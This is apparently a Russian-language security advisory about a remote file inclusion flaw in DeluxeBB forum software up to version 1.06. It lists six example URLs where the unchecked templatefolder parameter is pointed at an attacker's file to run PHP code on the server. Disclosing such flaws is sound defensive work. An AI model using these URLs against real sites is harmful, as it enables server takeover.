Программа: DeluxeBB <= 1.06
Удаленный пользователь может выполнить произвольный PHP-код. Из-за того, что форум не проверяет входной параметр templatefolder в различных скриптах, у нападающего появляется возможность указать на свой файл и выполнить его с привилегиями сервера.
Пример:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]
